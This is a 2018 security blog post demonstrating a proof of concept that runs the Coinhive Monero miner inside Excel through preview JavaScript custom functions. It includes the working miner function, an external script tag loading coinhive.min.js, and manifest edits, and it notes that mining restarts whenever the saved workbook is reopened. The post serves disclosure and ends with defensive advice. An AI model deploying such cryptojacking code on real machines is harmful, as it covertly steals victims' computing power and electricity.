JavaScript Coinhive in Excel

Timeline

This morning, I read that Microsoft announced that they have added JavaScript functions into the insiders preview build of Excel.

https://www.bleepingcomputer.com/news/microsoft/microsoft-adds-support-for-javascript-functions-in-excel/

Like most of you reading this, I couldn't wait for a proof of concept of coin mining within Excel using the new JavaScript functions.

I cannot wait for the first cryptocurrency miner in Excel
— Charles Dardaman (@CharlesDardaman) May 8, 2018

I even went as far as to offer a small bounty to anyone at Dallas Hackers who could build and present on it at next month's meetup.

I'll buy a beer to whoever presents cryptocurrency mining in Excel at the next @Dallas_Hackers
— Charles Dardaman (@CharlesDardaman) May 8, 2018

After making this offer, I started to read Microsoft's actual documentation on how to implement JavaScript within Excel, and decided I could do this myself. I then signed up for an account on coinhive.com and started to download the preview build of Excel for macOS. After over an hour of downloading the preview on my 5 Mbps internet, I was able to get my hands on it and get Coinhive running within the newest preview build of Excel.

GOT IT! #coinhive #Excel #Microsoft #Malware pic.twitter.com/QvHkgnGFkQ
— Charles Dardaman (@CharlesDardaman) May 8, 2018

Proof of Concept

In order to run Coinhive in Excel, I followed Microsoft's official documentation and just added my own function. There are three steps that Microsoft lists in order to get JavaScript running:

Install Office (build 9325 on Windows or 13.329 on Mac) and join the Office Insider program. (Note that it isn't enough just to get the latest build; the feature will be disabled on any build until you join the Insider program.)
Clone the Excel-Custom-Functions repo and follow the instructions in the README.md to start the add-in in Excel, make changes in the code, and debug.
Type =CONTOSO.ADD42(1,2) into any cell, and press Enter to run the custom function.

Microsoft's documentation covers the steps in detail. The first step is easy: select the Insider program from the update menu for Microsoft Office and allow it to update. This gives Excel the ability to run JavaScript functions.

Screenshot showing Excel Insider build update screen

Step two is where the magic happens. Head to Microsoft's GitHub and download the four important files:

customfunctions.html
customfunctions.js
customfunctions.json
customfunctions.xml

Once you have these files, you need to make a couple of edits in order to add in the Coinhive features and code from their documentation. For the HTML file, add the following no-auth script tag into the head so that Coinhive can be called later:

<script src="https://coinhive.com/lib/coinhive.min.js"></script>

For the JavaScript file, add in the following function which will then be called from within the Excel cell:

function MINER(){
    var miner = new CoinHive.Anonymous('Your Public Coinhive Key goes here.', {throttle: 0.7});

    if (!miner.isMobile() && !miner.didOptOut(14400)) {
        miner.start();
    }
}

In the JSON file, add data about the new MINER function so that Excel can load it.

{
    "name": "MINER",
    "description": "MINER MINER",
    "helpUrl": "http://dev.office.com",
    "result": {
        "type": "number",
        "dimensionality": "scalar"
    },
    "parameters": [],
    "options": {
        "sync": false
    }
}

After editing these three files, you must host them on a web server. I hosted them on a Linux VM running Apache so that I could easily hit the files locally.

Lastly, edit the XML file by adding in the web server IP address.

<SourceLocation DefaultValue="http://192.168.201.140/customfunctions.html"/>
...
<bt:Urls>
    <bt:Url id="JSON-URL" DefaultValue="http://192.168.201.140/customfunctions.json" />
    <bt:Url id="JS-URL" DefaultValue="http://192.168.201.140/customfunctions.js" />
    <bt:Url id="HTML-URL" DefaultValue="http://192.168.201.140/customfunctions.html" />
</bt:Urls>

This XML file is the manifest file that must currently be added into Excel for JavaScript to work. I assume this will change by the time JavaScript becomes fully supported in Excel, as most users will not be savvy enough to add in the functionality themselves. On macOS, I followed instructions on Microsoft's blog, which basically tell you to copy the XML file into the following location:

/Users/<username>/Library/Containers/com.microsoft.Excel/Data/documents/wef/

With all of these files in place and hosted, you're ready for step three. Open a new workbook in Excel and click Insert → My Add-ins; you should now see that your new functions have been added.

Excel custom function add-in showing new functions

Now, simply type the following into any cell on the sheet and hit enter:

=CONTOSO.MINER()

Your PC will now be mining Monero for you. This code does have persistence; if you save the XLSX sheet now and reopen it, your PC will instantly start to mine again without any user interaction.

Summary

Microsoft has, for some reason, decided that the business world needs yet another scripting language running within Office. Currently, it takes some effort to get JavaScript running within Excel, but I suspect that the difficulty will drop drastically as we near full support. Once that happens, I plan to take another look at this new attack vector.

If you are a blue-teamer, like me, wondering how to defend against such an attack, try to get in front of your IT team and have JavaScript disabled whenever it hits the full Office build. We do not currently know what controls Microsoft will put around JavaScript use, but it will probably be better to block it before your company becomes dependent on it.

If you have any questions regarding this proof of concept please reach out on Twitter. I'm happy to answer questions.